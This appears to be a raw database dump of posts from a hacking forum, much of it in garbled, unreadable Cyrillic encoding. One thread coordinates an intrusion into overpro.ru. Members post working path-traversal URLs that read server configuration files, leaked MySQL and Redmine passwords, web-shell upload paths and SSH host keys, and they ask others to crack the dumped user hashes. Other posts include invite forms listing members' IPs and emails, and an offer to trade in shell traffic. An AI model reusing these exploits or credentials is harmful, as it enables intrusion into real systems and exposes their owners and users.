ðÿûþðôõрþü php/shtml/htaccess фðùûы üþöýþ ôðöõ ýõ ÿытðтьÑÂÑ (ÿðÿúõ òыÑÂтðòûõýы ÿрðòð ò úþýфøóõ ÑÂõрòõрð).\r\n[*]Üþöýþ ÑÂúðчðть ûюñþù фðùû Ñ ÑÂõрòõрð (úрþüõ þчõýь ñþûьшøх).\r\n[*]Üþöýþ ÿþûучðть ûøÑÂтøýó фðùûþò ò ôøрõúтþрøø (ò òøôõ ÑÂтрðýýþóþ ñøýðрýþóþ фðùûð).\r\n[/LIST]\r\n\r\nÞôýþ òрõüѠÿытðÃȄÂѠрðÑÂúрутøть ýð чтþ-тþ ñþûьшõõ, þôýðúþ ýøчõóþ тþûúþòþóþ ÿрøôуüðть ýõ ÿþûучøûþÑÂÑŒ.\r\n\r\nÕÑÂûø у úþóþ-тþ õÑÂть öõûðýøõ ýðÿøÑÂðть ÑÂúрøÿт ø òыúðчðть òÑÂõ ÑÂúрøÿты Ñ ÑÂõрòõрð ôûѠôðûьýõùшõóþ ðýðûø÷ð ñыûþ ñы úрутþ.', 1, 0, '', 0, 1, 0, 0, 0), (1834, 1083, 1119, 'kx00', 6, '', 1409412305, 'ÑÂúуûю ýðшõû. ñð÷у ÑÂûøòðù. ты ÿþ úðúþüу ôþüõýу ýðшõû ôырúу?', 1, 1, '', 0, 1, 0, 0, 0), (1835, 1612, 1833, 'Psych0tr1a', 11, '', 1409415189, 'ð ÑÂüыÑÂû òыúðчøòðь òÑÂõ ÑÂрð÷у?\n\nûð÷õù ÿþ ÑÂðüþüу ÑÂðùту ÑÂüþтрø фуýúцøþýðû ÑÂтрðýøц ø þтúрыòðù ÿþтþü тõ фðùûы чтþ тõñõ ýуöýы.', 1, 0, '', 0, 1, 0, 0, 0), (1836, 1612, 1833, 'unlog', 45, '', 1409415919, 'тðúøü ÑÂÿþÑÂþñþü ýøчõóþ хþрþшõóþ ýðùôõýþ ýõ ñыûþ (õÑÂть ÿøÑÂðûúø ò ýõøÑÂÿþûýÑÂõüыõ фðùûы, phpinfo óôõ-тþ, üýþóþ òÑÂõóþ ÿþ üõûþчø).\n\nØüõѠôðüÿ ÑÂúрøÿтþò üþöýþ ÑÂôõûðть ÿþøÑÂú ýð ÿþтõýцøðûьýþ ю÷ðñõûьýыõ фуýúцøø, ø þттðûúøòðÑÂÑÂÑŒ þт ÑÂтþóþ ÑÂüþтрõть, üþöýþ ûø ÿрþтðûúýуть ò ýøх öõûðõüþõ ÷ýðчõýøõ.', 1, 0, '', 0, 1, 0, 0, 0), (1837, 1612, 1833, 'ropertus', 33, '', 1409419936, 'Here is some useful stuff I have found ))\n\n_http://overpro.ru/upload/download.php?file=/../../../../../../../../../../../../../../../../home/overpro/test/configuration.php\n\n$mosConfig_host = \'88.208.57.184\';\n$mosConfig_user = \'sitesql777\';\n$mosConfig_db = \'wwwoverproru\';\n$mosConfig_password = \'4o2thqkhgBnKgx7\';\n$mosConfig_secret = \'tJQKCLTrjZIiuK0S\';\n\nIs anyone able to connect and dump the database?\n\nI also found partial database dump here:\n\n_http://overpro.ru/upload/download.php?file=forum.sql\n\nIt has some user hashes, maybe someone can crack these?', 1, 1, '', 0, 1, 0, 0, 0), (1838, 1612, 1837, 'unlog', 45, '', 1409421080, '[QUOTE=ropertus;1837]Here is some useful stuff I have found ))\n\n...\n\nI also found partial database dump here:\n\n_http://overpro.ru/upload/download.php?file=forum.sql\n\nIt has some user hashes, maybe someone can crack these?[/QUOTE]\nThanks:)\n\nbut forum.sql is not from our target, most likely its from cs-expert.ru\n\n_http://www.overpro.ru/i.php - phpinfo();\n\nmore mysql credentials at\n_http://overpro.ru/upload/download.php?file=/../../../../../../../../home/zeta/zeta.php\n\n[CODE]$mysqli = new mysqli(\'db.0ver.pro\',\'zeta\',\'zetaanticheat\',\'zeta\');[/CODE]\nalso some $_REQUEST array members are not filtered against SQL injection (but I think there should be easier way of getting shell or db dump)\n\n[B]Does anybody have any ideas about format of directory listing file?[/B]', 1, 0, '', 0, 1, 0, 0, 0), (1839, 1613, 0, 'Invite', 2, '{$name}', 1409425900, '[SIZE=\'4\'][COLOR=\'Sienna\']checkermint[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: checkermint@lsd-25.ru\n[b]e-mail[/b]: checkermint@hellokitty.com\n[b]Info[/b]: Still trying to get this form to work. I am a pen tester with some bugs to sell, mostly file path traversal and some shell uploads. I take apart malware at my job. I like trading malware and finding rare samples, I have some to trade or give away.\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 178.63.97.34\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://www.flickr.com/photos/.../6228829506/ | https://www.flickr.com/photos/.../6228829506/ \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1840, 1614, 0, 'Invite', 2, '{$name}', 1409425953, '[SIZE=\'4\'][COLOR=\'Sienna\']checkermint[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: checkermint@lsd-25.ru\n[b]e-mail[/b]: checkermint@hellokitty.com\n[b]Info[/b]: Still trying to get this form to work. I am a pen tester with some bugs to sell, mostly file path traversal and some shell uploads. I take apart malware at my job. I like trading malware and finding rare samples, I have some to trade or give away.\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 178.63.97.34\n[*][b]real ip[/b]: 178.63.97.34\n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://www.flickr.com/photos/.../6228829506/ | https://www.flickr.com/photos/.../6228829506/ \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1841, 1615, 0, 'Invite', 2, '{$name}', 1409428604, '[SIZE=\'4\'][COLOR=\'Sienna\']S3D[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: Hacker\n[b]e-mail[/b]: zied142@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 197.0.175.43\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2138.3 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://s3d.cz | s3d.cz \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1842, 1612, 1833, 'Psych0tr1a', 11, '', 1409430721, '[url]http://www.overpro.ru/upload/[/url]\n\n[url]http://www.overpro.ru/upload/uploads/.htaccess[/url]\n\náтрðýýþ ýþ þý ýõ рðñþтðõт\n[url]http://www.overpro.ru/upload/uploads/wso.jpeg[/url]\n[url]http://www.overpro.ru/upload/uploads/wso.txt[/url]\n[url]http://www.overpro.ru/upload/uploads/wso.php[/url]\n[url]http://www.overpro.ru/upload/uploads/wso.php1[/url]\n[url]http://www.overpro.ru/upload/uploads/wso.php2[/url]\n[url]http://www.overpro.ru/upload/uploads/wso.phtml[/url]\n[url]http://www.overpro.ru/upload/uploads/wso.phtm[/url]\n[url]http://www.overpro.ru/upload/uploads/wso.html[/url]', 1, 0, '', 0, 1, 0, 0, 0), (1843, 1612, 1833, 'Psych0tr1a', 11, '', 1409430911, 'ýðшõû õщё ýõüýþóþ òÑÂÑÂúþóþ\n\nÃâ€Ã°Ã¼Ã¿\n[url]http://www.overpro.ru/dump.sql[/url]\n\n[url]http://www.overpro.ru/server-status[/url]\n\nфðùûы\n[url]http://www.overpro.ru/globals.php[/url]\n[url]http://www.overpro.ru/configuration.php[/url]\n\nÿðÿþчúø\n[url]http://www.overpro.ru/templates/[/url]\n[url]http://www.overpro.ru/editor/[/url]\n[url]http://www.overpro.ru/media/[/url]\n[url]http://www.overpro.ru/modules/[/url]\n[url]http://www.overpro.ru/files/[/url]', 1, 0, '', 0, 1, 0, 0, 0), (1844, 1612, 1833, 'Psych0tr1a', 11, '', 1409431324, 'LOL\nÑÂúðýы ôþúуüõýтþò ðôüøýþò шúþûьýøúþò\n\n[url]http://www.overpro.ru/upload/uploads/admins.rar[/url]', 1, 0, '', 0, 1, 0, 0, 0), (1845, 1612, 1833, 'unlog', 45, '', 1409432207, '[QUOTE=Psych0tr1a;1844]LOL\nÑÂúðýы ôþúуüõýтþò ðôüøýþò шúþûьýøúþò[/QUOTE]\n\nÑÂúðý ÿðÑÂÿþртð ÑÂтþ чðÑÂть ÿрþцõÑÂÑÂð øôõýтøфøúðцøø, тðú чтþ ÑÂтþóþ ôþñрð тðü ýðòðûþü.\n\n[QUOTE=Psych0tr1a;1842]\n_http://www.overpro.ru/upload/uploads/.htaccess\náтрðýýþ ýþ þý ýõ рðñþтðõт[/QUOTE]\n\nò nginx òрþôõ ýõт тðúþù штуúø úðú .htaccess\nàñûþú ò фðùûðх úþýфøóурðцøø:\n_http://overpro.ru/upload/download.php?file=/../../../../../../../../usr/local/etc/nginx/include/overpro.ru.conf\n[CODE]location ~ (/uploads|/images)\n{\n rewrite ^/upload/uploads/(.*)\\.view$ /upload/view.php?file=$1 last;\n rewrite ^/upload/uploads/(.*)\\.download$ /upload/download.php?file=$1 last;\n rewrite ^/upload/uploads/(.*)\\.admin$ /upload/admin.php?file=$1 last;\n # rewrite \"^/promo(.*)/:-\\)/captcha/([0-9a-z]{10,32}).jpg$\" /promo$1/kcaptcha/index.php?PHPSESSID=$2 last;\n\n index index.html;\n location ~ \\.(php|phtml|xml)$\n {\n #access_log /home/fddos/hackers.log hacker;\n return 404;\n } \n\n location ~ \\.exe.*$\n {\n access_log /home/fddos/hackers_exe.log hacker;\n return 404;\n } \n access_log off;\n expires 1d;\n\n}[/CODE]\n\nÕщõ тðü õÑÂть:\n[CODE] location ~ \\.shtml$ { ssi on; }[/CODE]\n[B]Úтþ Ñ SSI øüõû ôõûþ üþöõтõ ÿþÿрþñþòðть? [/B]\n\n[B]PS: ÃÂõ ôõûðùтõ úûøúðñõûьýых ÑÂÑÂыûþú ÿþöðûуùÑÂтð.[/B]', 1, 0, '', 0, 1, 0, 0, 0), (1846, 1612, 1845, 'ropertus', 33, '', 1409438283, '[QUOTE=unlog;1845]ÑÂúðý ÿðÑÂÿþртð ÑÂтþ чðÑÂть ÿрþцõÑÂÑÂð øôõýтøфøúðцøø, тðú чтþ ÑÂтþóþ ôþñрð тðü ýðòðûþü.\n\n\n\nò nginx òрþôõ ýõт тðúþù штуúø úðú .htaccess\nàñûþú ò фðùûðх úþýфøóурðцøø:\n_http://overpro.ru/upload/download.php?file=/../../../../../../../../usr/local/etc/nginx/include/overpro.ru.conf\n[CODE]location ~ (/uploads|/images)\n{\n rewrite ^/upload/uploads/(.*)\\.view$ /upload/view.php?file=$1 last;\n rewrite ^/upload/uploads/(.*)\\.download$ /upload/download.php?file=$1 last;\n rewrite ^/upload/uploads/(.*)\\.admin$ /upload/admin.php?file=$1 last;\n # rewrite \"^/promo(.*)/:-\\)/captcha/([0-9a-z]{10,32}).jpg$\" /promo$1/kcaptcha/index.php?PHPSESSID=$2 last;\n\n index index.html;\n location ~ \\.(php|phtml|xml)$\n {\n #access_log /home/fddos/hackers.log hacker;\n return 404;\n } \n\n location ~ \\.exe.*$\n {\n access_log /home/fddos/hackers_exe.log hacker;\n return 404;\n } \n access_log off;\n expires 1d;\n\n}[/CODE]\n\nÕщõ тðü õÑÂть:\n[CODE] location ~ \\.shtml$ { ssi on; }[/CODE]\n[B]Úтþ Ñ SSI øüõû ôõûþ üþöõтõ ÿþÿрþñþòðть? [/B]\n\n[B]PS: ÃÂõ ôõûðùтõ úûøúðñõûьýых ÑÂÑÂыûþú ÿþöðûуùÑÂтð.[/B][/QUOTE]\n\nServer side includes is possible!\n\nHere is my code\n[PHP]\n \n[/PHP]\n\n[url]http://www.overpro.ru/upload/uploads/ssi_1409438079.shtml[/url]\n\nI can\'t seem to get #INCLUDE or #EXEC to work though..', 1, 1, '', 0, 1, 0, 0, 0), (1848, 1616, 0, 'Psych0tr1a', 11, 'ÿøшу òÑÂõü ò ûøчúу , ÿøшу...', 1409503964, 'ÿøшу òÑÂõü ò ûøчúу , ÿøшу...\r\nø ÿþтþü òôруó ôþхþôøт чтþ ýõúтþ ýõ òøôøт чтþ øü ÿрøхþôÑÂÑ‚ ÑÂþþñщõýøÑÂ!\r\nтþòðрøщ ðôüøý òõрýø ñðр óôõ ñыûø òøôýы ÑÂþþñщõýøѠøûø ÑÂôõûðù чтþñы òыÑÂúðúøòðû ðûõрт úðú ýð ðчðтõ.', 1, 0, '', 0, 1, 0, 0, 0), (1849, 1617, 0, 'Invite', 2, '{$name}', 1409509093, '[SIZE=\'4\'][COLOR=\'Sienna\']crypto[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: goodlife@jabbim.com\n[b]e-mail[/b]: gumusserhat@yandex.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 212.253.202.141\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : Crypto : win2003@list.ru : : a259db0798e7517cdc76dcd3be480935\n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1850, 1616, 1848, 'ropertus', 33, '', 1409509404, 'I agree with this, would be a nice feature.', 1, 1, '', 0, 1, 0, 0, 0), (1851, 1612, 1833, 'unlog', 45, '', 1409512378, 'ØýфþрüðцøѠÿþ ÿþòþôу ÿрøрþôы ÑÂòûõýøѠѠþтôðчõù ñøýðрýþóþ фðùûð:\r\n[url]http://sla.ckers.org/forum/read.php?16,32409,32761[/url]\r\náúрøÿт ÿðрÑÂøýóð ýð php:\r\n[url]http://scipio-vs-carthago.blogspot.ru/2009/04/ufs.html[/url]\r\n\r\n[CODE]\r\n\r\nßðрÑÂøýó úðтðûþóþò FreeBSD þт Scipio\r\n\r\n\r\n\r\n

\">\r\n\"/>\r\n\r\n\'1\') and ($nexthex<\'8\'))\r\n {\r\n $pob=\"
\".\'[DIR] \';\r\n $nam=TRUE;\r\n $i+=4;\r\n }\r\n\r\n if (($curhex==\'080\') and ($nexthex>\'1\') and ($nexthex<\'8\'))\r\n {\r\n $pob=\"
\".\'[FILE] \';\r\n $nam=TRUE;\r\n $i+=4;\r\n }\r\n if (($curhex==\'0a0\') and ($nexthex>\'1\') and ($nexthex<\'8\'))\r\n {\r\n $pob=\"
\".\'[LINK] \';\r\n $nam=TRUE;\r\n $i+=4;\r\n }\r\n if ($nam===TRUE)\r\n {\r\n if (($s[$i]>\'1\') and ($s[$i]<\'8\'))\r\n {\r\n $hx=substr($s,$i,2);\r\n $hx=chr(hexdec($hx));\r\n $pob=$pob.$hx;\r\n }\r\n else {echo $pob; $nam=FALSE;}\r\n }\r\n }\r\n}\r\n?>\r\n\r\n[/CODE]\r\náтруúтурð:\r\n[url]http://scipio-vs-carthago.blogspot.ru/2009_11_01_archive.html[/url]\r\n[CODE]\r\nstruct ufs_dir_entry {\r\n __u32 d_ino; ///inode number of this entry\r\n __u16 d_reclen; ///length of this entry\r\n union {\r\n __u16 d_namlen; ///actual length of d_name\r\n struct {\r\n __u8 d_type; ///file type\r\n __u8 d_namlen; ///length of string in d_name\r\n } d_44;\r\n } d_u;\r\n __u8 d_name[UFS_MAXNAMLEN + 1]; ///file name\r\n};\r\n[/CODE]', 1, 0, '', 0, 1, 0, 0, 0), (1852, 1618, 0, 'Invite', 2, '{$name}', 1409514764, '[SIZE=\'4\'][COLOR=\'Sienna\']Krox[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: Indentity__@exploit.im\n[b]e-mail[/b]: Tyronehammondjohnson@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 89.187.145.24\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://krox.de | krox.de \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1853, 1619, 0, 'Invite', 2, '{$name}', 1409514767, '[SIZE=\'4\'][COLOR=\'Sienna\']Krox[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: Indentity__@exploit.im\n[b]e-mail[/b]: Tyronehammondjohnson@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 89.187.145.24\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://krox.de | krox.de \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1854, 1620, 0, 'Invite', 2, '{$name}', 1409514868, '[SIZE=\'4\'][COLOR=\'Sienna\']Krox[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: Indentity__@exploit.im\n[b]e-mail[/b]: Tyronehammondjohnson@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 217.14.208.233\n[*][b]real ip[/b]: 89.187.145.24\n[*][b]User agent[/b]: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://krox.de | krox.de \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1855, 1621, 0, 'Invite', 2, '{$name}', 1409516154, '[SIZE=\'4\'][COLOR=\'Sienna\']Bhat[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: Indentity__@outlook.com\n[b]e-mail[/b]: Chef_fehc@outlook.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\nI am familiar with PHP exploitation, skip tracing & SE\'ing to access otherwise inaccessible data. I push myself to the limits of my knowledge to do what needs to be done... I\'m a nice guy until I have a reason not to be... I\'m silent, I do what needs to be done & I get out, I don\'t stick around long enough for anyone to ask questions. \r\n\r\n\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 50.178.95.74\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://twitter.com/theashbhat | https://twitter.com/theashbhat \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1857, 1622, 0, 'kx00', 6, '� у шеллы.', 1409541960, 'úûøõýт ÿþÑÂòøÃȄÂѠýð ру шõûûы. þцõýúð ~10$/1ú трðффð. ÑÂтучøтõ ôðü úþýтðúт.\nтõüðтøúð ûюñðÑÂ. тþûьúþ трðфøÑÂтыõ. тþûьúþ хðрôúþр!', 1, 1, '', 0, 1, 0, 0, 0), (1861, 1612, 1833, 'unlog', 45, '', 1409555634, '_ttp://task.0ver.pro = /home/redmine/public\n\n/home/redmine/public/.auth\n[CODE]redmine:GJg5csAgVZgzI[/CODE]\n\n/home/redmine/config/database.yml\n[CODE]production:\n adapter: mysql2\n database: redmine\n host: db.0ver.pro\n username: redmine\n password: \"o8YCkG5Yx2\"\n encoding: utf8\n[/CODE]\n\n_ttp://88.208.61.34:82/server-status\n\núтþ-ýøñуôь ÿрþñþòðû ø÷òýõ ú mysql úþýýõúтøтьÑÂÑÂ?', 1, 0, '', 0, 1, 0, 0, 0), (1859, 1083, 1119, 'BigBear', 34, '', 1409549938, 'ãòøôõû. Ãâ€Ã»Ñ Ã¿Ñ€Ã¾Ã²ÃµÑ€ÃºÃ¸ - ýуöýы ôðýýыõ òþт þт ÑÂтþóþ ðúúð\n\n\n_http://www.toranoana.jp/bl/\nID:B7317705 \n\nÃâ€Ã¾ÑÂтðýь üýõ òÑÂÑ‘ чтþ üþöõшь, ÿþ цõýõ ÑÂþóûðÑÂую.', 1, 0, '', 0, 1, 0, 0, 0), (1860, 1612, 1833, 'w0rm', 1, '', 1409550399, 'úûючøúø\n[code]\ndev.overpro.ru ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAxny/6Z+Qgpp+Mqsyd1rvFgkzRQtPeRl6MgARHfmkdqm3y09V/TRMeJ0LTMto8/Al7ZwGjp+pJBm8NzI41mPsix0cafmD0TISHmFoLqaPGqohmpp6AlsM9JfyO3slotXOWc9DJXb2DckZJM3idYqpCBTeWHXq9nvn5NtoJ+xGnefptXb8kquHW/zaeO/8lrNU6yMWcjXrB30nbTIUB2tPUSjmU/DkKupsTdYCzs204WEoS+KN/mN5X/DHH4gVM6fmiNRwsvzlWgRMLd80R81Ne5uDCBWwhLG0R6XRCW8oS2x85eP+U1SbThebQWNHxNlL0F+TbWeKBR/I0NJ6b5vd0Q==\never4ever.ru ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC+7qAH5IGj36MnTUBWGo9lYyq3HqiEcoHFU2zS9Bmk00OCovkeqyY7Fth1eyyjnY93CRGofeGgAdr+S1UHrJK7drOUS6ecmcbo54JxKJse9t8y+vx0FI9kbRXYsW9Yp3xgaBG9E8V0hFdIfPvckMTvEZ+PB18UaEz24FaE3qwyS04mU0gPqI8UbfsPAqTtK/tC1UbW726Ia8Y9BCsBKYLUb8IgVxa+wTp5eifox5qpcPo31i0stK0VNAU5SCQekHauiSSNe2BqnV1EDA1L1x6I9M+sKtqAWKSVeZbGJBFWBYDGfyR7Q9NNZTokOn1BtNTX5Zofrfy/bSYay/5KQc+7\npromir.tv ssh-rsa 